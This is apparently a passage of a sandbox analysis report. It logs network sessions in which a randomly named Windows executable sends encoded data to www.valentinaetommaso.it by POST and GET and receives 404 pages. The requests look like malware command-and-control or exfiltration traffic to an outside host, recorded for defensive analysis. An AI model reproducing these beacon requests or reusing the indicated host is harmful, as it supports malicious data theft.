                            May 14, 2024 12:53:39.668948889 CEST1289INData Raw: eb 7b 59 6f 18 fb 8b 19 f4 86 fb eb 22 48 ee ae 82 29 0c b2 38 39 99 4e 77 be a5 c5 e6 3c 76 28 85 de 50 64 ff af 5e 05 92 b7 f2 ee 8d 16 b6 f7 2f e2 77 df ee 3e 0a 8e 33 17 4a 69 9c 4d 1e 05 df 7d b7 9b bd 09 de b9 49 30 8b 6f 82 93 0c 6a 6b b0
                            Data Ascii: {Yo"H)89Nw<v(Pd^/w>3JiM}I0ojkz}UQ3a$;$Tv*^^0r)2F&"FAOvLay2$vvLDfm2SweFj"Xay9BtN;aVzWUx{}g;
                            May 14, 2024 12:53:39.668962002 CEST1289INData Raw: 8e 12 c8 1b 79 76 40 9d c2 e5 c8 d5 3b 8e e3 31 ec 62 6f 3c f3 22 8c 2e a1 a7 10 7e 4c 97 8e cf ef c3 61 ef c7 eb 8b ea 7e bb 79 71 71 f5 bc a2 40 4c 02 3a 3a 7a 60 1c f5 59 f9 50 f2 8f a2 c5 7a b4 6f c1 f2 77 47 10 1c c1 a3 9b 30 0d a1 2c c3 ec
                            Data Ascii: yv@;1bo<".~La~yqq@L::z`YPzowG0,hA>VkEx\hf?~ZgF~H 4p2UAUIJ<J21ZOLW'U'OCE~P#<1+j,LN#QI+UQ.^3d\
                            May 14, 2024 12:53:39.668983936 CEST1289INData Raw: a9 3c 3e 7f ee 5c 9c 5c bf 3a bf 78 f9 e2 fc a5 f3 e4 dc d9 6c 24 2a db 10 5c a7 ac 2e b5 97 d3 3a c3 32 81 38 f8 2f c7 e3 7a 91 65 f0 c3 c3 c9 0f 3f 3c 9e 92 10 1e 79 04 69 84 df 44 83 74 fe 88 7e 48 dd 33 f6 f2 6b 50 30 8b 62 2d 59 68 ed ab b9
                            Data Ascii: <>\\:xl$*\.:28/ze?<yiDt~H3kP0b-Yh0!`5*-K/!,dIAMS_P!rrS_d~/W)Kg.f=T/`{pv%8In`zJg<\C~I|F8~^m
                            May 14, 2024 12:53:39.668999910 CEST1289INData Raw: 6e ab 03 f1 0c 19 dc 04 5f 1c 36 9b 82 e1 81 7a 06 31 65 79 60 8a 48 6b a1 25 69 fd 13 67 19 2b 3a 27 36 07 41 22 03 0b 45 6d 90 11 60 29 4c ba 6d b6 83 a8 54 8f 32 0a 19 7a 17 0b be e5 82 c7 30 ee 2e 29 d0 3c 54 8f 6d 10 53 6a 34 bb a4 43 63 9f
                            Data Ascii: n_6z1ey`Hk%ig+:'6A"Em`)LmT2z0.)<TmSj4Cc:2[ "X^_>}G"Oki+[o&?CKp @/6,ny*yg2L@]-x5?J\nDRlCC1Nb&1oGBVGO|
                            May 14, 2024 12:53:39.669013977 CEST1289INData Raw: 72 7e 7d fe f2 c5 c9 f3 6d 6a 5f 3d 3b bf bc 44 87 fd d3 97 57 06 34 10 46 3c fe 2f 58 5f 7d 46 76 08 1b a6 17 94 26 14 72 0b 46 df 18 1c 42 f5 1e db 28 58 78 fe 5d fe 5e 46 d7 cf bc 0f fd 20 52 56 cd 51 a5 21 01 e4 0b 24 a8 dc 61 3e 87 5c e6 88
                            Data Ascii: r~}mj_=;DW4F</X_}Fv&rFB(Xx]^F RVQ!$a>\uZi|WEs-8na>-oT=9+5imU=PKN)u.2oZ|wq=K#FPQV("Q;$D2;J>^+, HSpF)m
                            May 14, 2024 12:53:39.669027090 CEST1289INData Raw: 40 b9 70 6a bd 67 ae 3e c4 f8 d2 7b 3d ce be a2 3a b7 3b 80 28 5d 9c c0 37 7c 07 0b b1 10 52 e3 6b 4f a6 4a 51 6e 7c 32 4c 39 71 86 d0 cc e5 26 93 0f 44 9d 3f 39 b9 3e eb 5f 9f 5f 9c f1 15 6e 32 7a 0f 12 7e 3d 74 bf 9e b9 5f ff dd f9 fa d9 d1 d7
                            Data Ascii: @pjg>{=:;(]7|RkOJQn|2L9q&D?9>__n2z~=t_$0@oo{w>[M}n[7/m)LiOiCwfRRw#|\%bG-OW+fKcC^N_zuEO*sdCPL<Df
                            May 14, 2024 12:53:39.669039965 CEST1289INData Raw: c5 30 d5 3c 88 3c 74 b3 98 7a 49 4e e4 87 c7 cf 71 c3 9d 40 4f 89 21 c5 7d a3 ce a7 41 a2 29 39 8e 59 3e bc 61 3c 0b 7d 84 73 a1 7f e7 24 7f 5b 8c 14 d1 60 88 e2 c2 40 71 65 b1 37 96 e1 63 b2 42 98 64 a0 1f 2c 1e de 80 e7 9c e0 3a 1c 19 35 26 6e
                            Data Ascii: 0<<tzINq@O!}A)9Y>a<}s$[`@qe7cBd,:5&nw?HWN{ p:hVJ)Blpg8sXO_SwhD{q<:@YSA4z?Y#.3No7h&!uTj[P\BV$kA>Q.EUwQE
                            May 14, 2024 12:53:39.669054985 CEST1289INData Raw: db 33 18 4b 9a f0 08 9d e7 f9 bd 3a 95 bf 84 15 f4 0f e0 86 2f c9 12 b1 fb 62 11 df c0 77 0b 43 e4 de da f3 04 5f f9 c3 14 11 a8 65 d4 65 1e 17 32 6a b0 05 b4 3a 81 8f c4 1c 3c 29 f9 0e b3 d6 0f 26 f1 14 5b 72 a8 b1 51 7c a1 0f 25 52 37 3f 86 fa
                            Data Ascii: 3K:/bwC_ee2j:<)&[rQ|%R7?ytg]tI|n!hB W8%0f>\VpXxjaRgnt*yChP!sx(Fu`IuykisRjcNsYBkQ
                            May 14, 2024 12:53:39.669068098 CEST1289INData Raw: fc 59 b9 c0 66 09 33 69 36 6f 70 b3 a2 00 01 a3 eb bb e3 97 f9 6a 11 70 ca af 4e db 50 8b 37 7e 5c 16 bb 58 32 2d 6b e3 8e 83 f5 0d 70 10 e1 4f ce 23 8b 78 e7 76 86 da 89 f6 ef 70 fb 2b 8e 79 31 3f 73 1f fa f9 93 33 7c 6f c1 d3 f3 b3 57 b9 13 9d
                            Data Ascii: Yf3i6opjpNP7~\X2-kpO#xvp+y1?s3|oWaZdu=M7_JE\jFQ\W1VDlJ:c &#Gv6r:Yp:R*jBhn.A[kU],=,YrzLk+
                            May 14, 2024 12:53:39.993608952 CEST1289INData Raw: 52 fd d7 f2 76 7d 0b f8 5c 93 ac 8f ab 3b a4 11 be ba 64 36 c0 45 00 3c 82 b1 90 bb 62 25 24 81 a2 9a f4 e6 5c 48 35 e7 84 d5 14 9e 08 5a 7f 08 ca 19 ae dc bb 17 06 cc eb db be 44 8a c9 6d 32 2b 54 85 09 74 8b 51 20 92 4c ca 0b c2 62 e4 c5 6b 0b
                            Data Ascii: Rv}\;d6E<b%$\H5ZDm2+TtQ Lbkoz9'yC0x):r>grCV#A!;9PM7Ziz,3O^1RDTW*#Bl1>r2]G+&>p_p6{ScL-D60k>|


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            31192.168.2.10497503.125.172.46803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:53:42.129127026 CEST1782OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.valentinaetommaso.it
                            Origin: http://www.valentinaetommaso.it
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 1227
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.valentinaetommaso.it/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 6e 4c 77 37 62 41 57 64 69 61 50 47 48 2b 2f 37 44 49 73 79 54 50 47 74 7a 4d 4e 6a 70 7a 46 63 4e 75 48 55 73 2b 77 65 49 72 70 70 79 69 51 79 67 38 4d 49 55 35 74 6a 61 6a 44 32 76 4d 6d 2f 63 6e 65 77 52 30 53 6b 34 75 2f 55 4b 72 42 71 50 69 66 77 49 2f 44 4a 68 55 31 64 54 45 4f 4e 6d 54 45 2f 6d 78 44 55 6a 53 76 4f 41 70 58 65 4c 6e 39 35 2b 45 37 68 54 31 76 4f 51 38 45 6d 4d 64 75 55 34 35 62 75 30 74 79 4e 54 34 4e 50 71 42 58 36 4f 6f 62 68 56 64 57 52 52 59 54 64 52 61 71 76 72 5a 2f 77 6c 2f 44 55 51 68 53 37 6e 71 46 6d 37 79 64 58 38 63 30 37 64 4d 56 35 37 56 46 68 5a 6c 67 74 77 49 4a 2f 34 48 4c 63 53 33 4d 38 35 79 6f 4c 39 75 76 31 45 65 6a 63 56 77 73 39 48 72 54 38 38 44 33 5a 53 4d 56 52 6d 4c 41 46 2f 49 50 43 33 67 4c 42 50 4f 72 4a 7a 52 59 2b 63 65 74 71 6b 76 63 73 79 4a 48 49 50 52 57 77 42 30 6e 4d 56 6f 47 59 71 41 59 6d 78 37 5a 56 33 6c 31 71 49 2f 39 30 78 30 57 67 4d 36 6f 77 42 67 32 50 46 2b 38 4a 38 73 6b 4b 47 6e 71 4b 4f 65 48 38 4a 48 56 34 7a 45 73 [TRUNCATED]
                            Data Ascii: Fb=nLw7bAWdiaPGH+/7DIsyTPGtzMNjpzFcNuHUs+weIrppyiQyg8MIU5tjajD2vMm/cnewR0Sk4u/UKrBqPifwI/DJhU1dTEONmTE/mxDUjSvOApXeLn95+E7hT1vOQ8EmMduU45bu0tyNT4NPqBX6OobhVdWRRYTdRaqvrZ/wl/DUQhS7nqFm7ydX8c07dMV57VFhZlgtwIJ/4HLcS3M85yoL9uv1EejcVws9HrT88D3ZSMVRmLAF/IPC3gLBPOrJzRY+cetqkvcsyJHIPRWwB0nMVoGYqAYmx7ZV3l1qI/90x0WgM6owBg2PF+8J8skKGnqKOeH8JHV4zEsIYgHI/SOWzuFrQ2D/7Drx0+XASey9x9JxKfWpl5pz1EJBwXEwjOV1PVkWpMBwzMs4C9lHqXrJRJqF6d/undjKqTVuWbWwRO+MaILAYf5fZGTyORDKwkNXso7+uvsBjbLfc0JiwWMeERE6loDwyEMpDNnfuJjkABVA7XqKUB8uPPIekC7BsmCgF8hF2DISYfYT6ybnTMLkLEnsHpUQmFsUSNMJqoCpgbXk7Ta7Y1tlk7FE09vDowhDN0AZ73bZL8jFMAXKO7OAOhwOw5ab1ixX7M69mn6L9zntLD1fnGRUOu/gGM0G4WyzxM1lKoc+0GldF610KWRBg+kOnKMu65ivrwmQmwopuqfKzS22mF8h4o4srMz22p+yurKU0dD8wKGG5ewmwRM6SpywONXsOC9mD9tHUKbXiJHg+N2erujxzHKVLbBq+ky1wAgL4prIr42xUQbKGs8xMb2Gyb/Mln38fQcyThpPQX/kp0V4XqKthFLqXQmWL1YWXvUU2Ua3SRSv1sgrm6t9Aj8dZY5PaE+mg6/XnvllflQGbGaxGGHKwg3onq5lBpR/E2HtrE6m6Yg/t0Zy3FZP5zx3zKvjTd0OZRWwbC+MWw4Wb3QDmG6onK0zZLW4QzhgyfUoEZ4lb1TTMdOdK+ObeA157I3xGGrAYpX+n7EzsI4Ki [TRUNCATED]
                            May 14, 2024 12:53:42.520596027 CEST1289INHTTP/1.1 404 Not Found
                            Server: openresty
                            Date: Tue, 14 May 2024 10:53:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=cunn2u2jahac4hf0sls9abp48f; path=/; domain=valentinaetommaso.it; HttpOnly
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            Content-Encoding: gzip
                            Data Raw: 33 37 38 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d dd 76 db c6 92 ee f5 de 6b cd 3b 20 9c 49 22 9d 88 e0 af 44 51 16 9d 51 64 39 d6 19 cb d6 b6 e4 64 f6 b6 3d 5c 20 08 92 88 49 80 01 40 c9 b2 e3 07 3b d7 e7 c5 ce f7 55 77 03 0d fe 48 74 92 59 b3 2f 8e 97 25 81 e8 ee ea ea ea ea aa ea ea aa e6 f1 57 4f 5e 9e 5e ff fd f2 cc 99 64 b3 e9 e3 bf 1e f3 8f e3 4f bd 34 ed 55 a2 b8 fa 4b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa af 15 67 ea 45 e3 5e 25 cc 2a 8f ff 05 ed 03 6f f8 f8 78 1a 46 ef 9d 24 98 f6 2a 68 ec c7 51 14 f8 59 c5 99 00 50 af 62 40 0c 1b c3 b0 39 fd b8 98 74 3b a3 49 d3 f5 a7 f1 62 38 4a e2 28 73 a3 00 95 fd 24 4e d3 38 09 c7 61 b4 1d bc 11 9a a6 ee 38 cd bc 2c f4 5d 3f 9e 2d c1 98 05 99 e7 f8 13 2f 49 83 ac 57 59 64 a3 ea 61 c5 86 1c 02 cf 2f c2 b1 36 0a a7 41 5a 6b 0e f1 3f e4 cf 4d 6b e2 a6 37 e3 ef e7 93 9e 3f 68 79 9d c3 a0 bb df a9 38 d9 dd 3c 00 7d 66 de 38 a8 a1 f8 bb 0f b3 69 c5 49 c3 8f 01 48 ec 45 77 7f 0a 12 f5 4e ad de 19 f1 e7 e3 af 87 5f [TRUNCATED]
                            Data Ascii: 3781}vk; I"DQQd9d=\ I@;UwHtY/%WO^^dO4UKZqI0?*yzT;jQgE^%*oxF$*hQYPb@9t;Ib8J(s$N8a8,]?-/IWYda/6AZk?Mk7?hy8<}f8iIHEwN_DCOAKK?.7Oj/IKo_oz>9r0 8YMz:8s8r$GGpG!LU,4>67<NL0MUFazjr#%Qf)'+18f:)~lQ]/zVo~.3GFYLaNuss3O rhHQQ`3$V80C3%RSZ-F5Yk5C'3OI$O"Kg>28$}^O$qcxnz9#h{OXCIIo84ItZ6Z3%VV<NPzVoL1?a>ryxgg4Ux9YOoa|)O8Q
                            May 14, 2024 12:53:42.520622015 CEST1289INData Raw: eb 7b 59 6f 18 fb 8b 19 f4 86 fb eb 22 48 ee ae 82 29 0c b2 38 39 99 4e 77 be a5 c5 e6 3c 76 28 85 de 50 64 ff af 5e 05 92 b7 f2 ee 8d 16 b6 f7 2f e2 77 df ee 3e 0a 8e 33 17 4a 69 9c 4d 1e 05 df 7d b7 9b bd 09 de b9 49 30 8b 6f 82 93 0c 6a 6b b0
                            Data Ascii: {Yo"H)89Nw<v(Pd^/w>3JiM}I0ojkz}UQ3a$;$Tv*^^0r)2F&"FAOvLay2$vvLDfm2SweFj"Xay9BtN;aVzWUx{}g;
                            May 14, 2024 12:53:42.520637035 CEST1289INData Raw: 8e 12 c8 1b 79 76 40 9d c2 e5 c8 d5 3b 8e e3 31 ec 62 6f 3c f3 22 8c 2e a1 a7 10 7e 4c 97 8e cf ef c3 61 ef c7 eb 8b ea 7e bb 79 71 71 f5 bc a2 40 4c 02 3a 3a 7a 60 1c f5 59 f9 50 f2 8f a2 c5 7a b4 6f c1 f2 77 47 10 1c c1 a3 9b 30 0d a1 2c c3 ec
                            Data Ascii: yv@;1bo<".~La~yqq@L::z`YPzowG0,hA>VkEx\hf?~ZgF~H 4p2UAUIJ<J21ZOLW'U'OCE~P#<1+j,LN#QI+UQ.^3d\
                            May 14, 2024 12:53:42.520653009 CEST1289INData Raw: a9 3c 3e 7f ee 5c 9c 5c bf 3a bf 78 f9 e2 fc a5 f3 e4 dc d9 6c 24 2a db 10 5c a7 ac 2e b5 97 d3 3a c3 32 81 38 f8 2f c7 e3 7a 91 65 f0 c3 c3 c9 0f 3f 3c 9e 92 10 1e 79 04 69 84 df 44 83 74 fe 88 7e 48 dd 33 f6 f2 6b 50 30 8b 62 2d 59 68 ed ab b9
                            Data Ascii: <>\\:xl$*\.:28/ze?<yiDt~H3kP0b-Yh0!`5*-K/!,dIAMS_P!rrS_d~/W)Kg.f=T/`{pv%8In`zJg<\C~I|F8~^m
                            May 14, 2024 12:53:42.520675898 CEST1289INData Raw: 6e ab 03 f1 0c 19 dc 04 5f 1c 36 9b 82 e1 81 7a 06 31 65 79 60 8a 48 6b a1 25 69 fd 13 67 19 2b 3a 27 36 07 41 22 03 0b 45 6d 90 11 60 29 4c ba 6d b6 83 a8 54 8f 32 0a 19 7a 17 0b be e5 82 c7 30 ee 2e 29 d0 3c 54 8f 6d 10 53 6a 34 bb a4 43 63 9f
                            Data Ascii: n_6z1ey`Hk%ig+:'6A"Em`)LmT2z0.)<TmSj4Cc:2[ "X^_>}G"Oki+[o&?CKp @/6,ny*yg2L@]-x5?J\nDRlCC1Nb&1oGBVGO|
                            May 14, 2024 12:53:42.520689964 CEST1289INData Raw: 72 7e 7d fe f2 c5 c9 f3 6d 6a 5f 3d 3b bf bc 44 87 fd d3 97 57 06 34 10 46 3c fe 2f 58 5f 7d 46 76 08 1b a6 17 94 26 14 72 0b 46 df 18 1c 42 f5 1e db 28 58 78 fe 5d fe 5e 46 d7 cf bc 0f fd 20 52 56 cd 51 a5 21 01 e4 0b 24 a8 dc 61 3e 87 5c e6 88
                            Data Ascii: r~}mj_=;DW4F</X_}Fv&rFB(Xx]^F RVQ!$a>\uZi|WEs-8na>-oT=9+5imU=PKN)u.2oZ|wq=K#FPQV("Q;$D2;J>^+, HSpF)m
                            May 14, 2024 12:53:42.520704985 CEST1289INData Raw: 40 b9 70 6a bd 67 ae 3e c4 f8 d2 7b 3d ce be a2 3a b7 3b 80 28 5d 9c c0 37 7c 07 0b b1 10 52 e3 6b 4f a6 4a 51 6e 7c 32 4c 39 71 86 d0 cc e5 26 93 0f 44 9d 3f 39 b9 3e eb 5f 9f 5f 9c f1 15 6e 32 7a 0f 12 7e 3d 74 bf 9e b9 5f ff dd f9 fa d9 d1 d7
                            Data Ascii: @pjg>{=:;(]7|RkOJQn|2L9q&D?9>__n2z~=t_$0@oo{w>[M}n[7/m)LiOiCwfRRw#|\%bG-OW+fKcC^N_zuEO*sdCPL<Df
                            May 14, 2024 12:53:42.520719051 CEST1289INData Raw: c5 30 d5 3c 88 3c 74 b3 98 7a 49 4e e4 87 c7 cf 71 c3 9d 40 4f 89 21 c5 7d a3 ce a7 41 a2 29 39 8e 59 3e bc 61 3c 0b 7d 84 73 a1 7f e7 24 7f 5b 8c 14 d1 60 88 e2 c2 40 71 65 b1 37 96 e1 63 b2 42 98 64 a0 1f 2c 1e de 80 e7 9c e0 3a 1c 19 35 26 6e
                            Data Ascii: 0<<tzINq@O!}A)9Y>a<}s$[`@qe7cBd,:5&nw?HWN{ p:hVJ)Blpg8sXO_SwhD{q<:@YSA4z?Y#.3No7h&!uTj[P\BV$kA>Q.EUwQE
                            May 14, 2024 12:53:42.520731926 CEST1289INData Raw: db 33 18 4b 9a f0 08 9d e7 f9 bd 3a 95 bf 84 15 f4 0f e0 86 2f c9 12 b1 fb 62 11 df c0 77 0b 43 e4 de da f3 04 5f f9 c3 14 11 a8 65 d4 65 1e 17 32 6a b0 05 b4 3a 81 8f c4 1c 3c 29 f9 0e b3 d6 0f 26 f1 14 5b 72 a8 b1 51 7c a1 0f 25 52 37 3f 86 fa
                            Data Ascii: 3K:/bwC_ee2j:<)&[rQ|%R7?ytg]tI|n!hB W8%0f>\VpXxjaRgnt*yChP!sx(Fu`IuykisRjcNsYBkQ
                            May 14, 2024 12:53:42.520746946 CEST1289INData Raw: fc 59 b9 c0 66 09 33 69 36 6f 70 b3 a2 00 01 a3 eb bb e3 97 f9 6a 11 70 ca af 4e db 50 8b 37 7e 5c 16 bb 58 32 2d 6b e3 8e 83 f5 0d 70 10 e1 4f ce 23 8b 78 e7 76 86 da 89 f6 ef 70 fb 2b 8e 79 31 3f 73 1f fa f9 93 33 7c 6f c1 d3 f3 b3 57 b9 13 9d
                            Data Ascii: Yf3i6opjpNP7~\X2-kpO#xvp+y1?s3|oWaZdu=M7_JE\jFQ\W1VDlJ:c &#Gv6r:Yp:R*jBhn.A[kU],=,YrzLk+
                            May 14, 2024 12:53:42.832915068 CEST1289INData Raw: 52 fd d7 f2 76 7d 0b f8 5c 93 ac 8f ab 3b a4 11 be ba 64 36 c0 45 00 3c 82 b1 90 bb 62 25 24 81 a2 9a f4 e6 5c 48 35 e7 84 d5 14 9e 08 5a 7f 08 ca 19 ae dc bb 17 06 cc eb db be 44 8a c9 6d 32 2b 54 85 09 74 8b 51 20 92 4c ca 0b c2 62 e4 c5 6b 0b
                            Data Ascii: Rv}\;d6E<b%$\H5ZDm2+TtQ Lbkoz9'yC0x):r>grCV#A!;9PM7Ziz,3O^1RDTW*#Bl1>r2]G+&>p_p6{ScL-D60k>|


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            32192.168.2.10497513.125.172.46803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:53:44.973244905 CEST470OUTGET /aleu/?Fb=qJYbYwaLgLDJAMSHMJQaEOr73chNsD5VMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjWe/ogXVMOXyO4l4P9y/SnxDkYImARg==&Cvp=4jl0Z4R0O HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Host: www.valentinaetommaso.it
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            May 14, 2024 12:53:45.361953020 CEST1289INHTTP/1.1 404 Not Found
                            Server: openresty
                            Date: Tue, 14 May 2024 10:53:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=0qbha5f6d9341curma4a42tb68; path=/; domain=valentinaetommaso.it; HttpOnly
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            Data Raw: 61 31 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 [TRUNCATED]
                            Data Ascii: a170<!DOCTYPE html><html class="no-js" prefix="og: https://ogp.me/ns#" lang="it"><head><link rel="preconnect" href="https://d1di2lzuh97fh2.cloudfront.net" crossorigin><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><meta charset="utf-8"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957" type="image/svg+xml" sizes="any"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957" type="image/svg+xml" sizes="16x16"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="apple-touch-icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title
                            May 14, 2024 12:53:45.361975908 CEST1289INData Raw: 3e 34 30 34 20 2d 20 50 61 67 69 6e 61 20 6e 6f 6e 20 74 72 6f 76 61 74 61 20 3a 3a 20 6d 61 74 72 69 6d 6f 6e 69 6f 76 61 6c 65 6e 74 69 6e 61 65 74 6f 6d 6d 61 73 6f 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                            Data Ascii: >404 - Pagina non trovata :: matrimoniovalentinaetommaso</title> <meta name="viewport" content="width=device-width,initial-scale=1"> <meta name="msapplication-tap-highlight" content="no"> <link href="https://d1di2lzuh97fh2.cloud
                            May 14, 2024 12:53:45.361989021 CEST1289INData Raw: 66 69 6c 65 73 2f 31 61 2f 31 61 6e 2f 31 61 6e 66 70 67 2e 63 73 73 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 64 61 74 61 2d 77 6e 64 5f 74 79 70 6f 67 72 61 70 68 79 5f 66 69 6c 65 3d 22 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c
                            Data Ascii: files/1a/1an/1anfpg.css?ph=cb3a78e957" data-wnd_typography_file=""><link rel="stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957" data-wnd_typography_desktop_file="" media="screen and (min-width:37.5e
                            May 14, 2024 12:53:45.362004042 CEST1289INData Raw: 63 6f 6e 74 72 6f 6c 6c 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 63 6f 72 72 65 74 74 6f 2e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e
                            Data Ascii: controlla se hai inserito l'indirizzo corretto."><meta name="keywords" content=""><meta name="generator" content="Webnode 2"><meta name="apple-mobile-web-app-capable" content="no"><meta name="apple-mobile-web-app-status-bar-style" content="bla
                            May 14, 2024 12:53:45.362020016 CEST1289INData Raw: 62 3d 22 22 3b 66 6f 72 28 76 61 72 20 67 3d 31 3b 33 3e 3d 67 3b 67 2b 2b 29 62 2b 3d 28 22 30 22 2b 70 61 72 73 65 49 6e 74 28 68 5b 67 5d 2c 31 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 32 29 3b 22 30 22 3d 3d 3d
                            Data Ascii: b="";for(var g=1;3>=g;g++)b+=("0"+parseInt(h[g],10).toString(16)).slice(-2);"0"===b.charAt(0)&&(d=parseInt(b.substr(0,2),16),d=Math.max(16,d),b=d.toString(16)+b.slice(-4));f.push(c[e][0]+"="+b)}if(f.length){var k=a.getAttribute("data-src"),l=k
                            May 14, 2024 12:53:45.362032890 CEST1289INData Raw: 68 6e 2d 64 65 66 61 75 6c 74 20 77 6e 64 2d 6d 74 2d 63 6c 61 73 73 69 63 20 77 6e 64 2d 6e 61 2d 63 20 6c 6f 67 6f 2d 63 6c 61 73 73 69 63 20 73 63 2d 77 20 20 20 77 6e 64 2d 77 2d 77 69 64 65 72 20 77 6e 64 2d 6e 68 2d 6d 20 68 6d 2d 68 69 64
                            Data Ascii: hn-default wnd-mt-classic wnd-na-c logo-classic sc-w wnd-w-wider wnd-nh-m hm-hidden menu-default"><div class="s-w"><div class="s-o"><div class="s-bg"> <div class="s-bg-l"> </div></div><
                            May 14, 2024 12:53:45.362046957 CEST1289INData Raw: 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 48 6f 6d 65 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 09 09 3c 2f 6c 69 3e 3c 6c 69 3e 0a 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 2f 69 6c 2d
                            Data Ascii: ss="menu-item-text">Home</span></a></li><li><a class="menu-item" href="/il-giorno-del-matrimonio/"><span class="menu-item-text">Il giorno del matrimonio</span></a></li><li><a class="menu-item" href="/conferma-partecipazione/"><sp
                            May 14, 2024 12:53:45.362061977 CEST1289INData Raw: 6f 20 74 72 6f 76 61 72 65 20 6c 61 20 70 61 67 69 6e 61 20 63 68 65 20 73 74 61 69 20 63 65 72 63 61 6e 64 6f 2e 20 50 65 72 20 66 61 76 6f 72 65 20 63 6f 6e 74 72 6f 6c 6c 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69
                            Data Ascii: o trovare la pagina che stai cercando. Per favore controlla se hai inserito l'indirizzo corretto.</p></div></div></div></div></div></div></div></section></div></div> </main> <footer class="l-f cf">
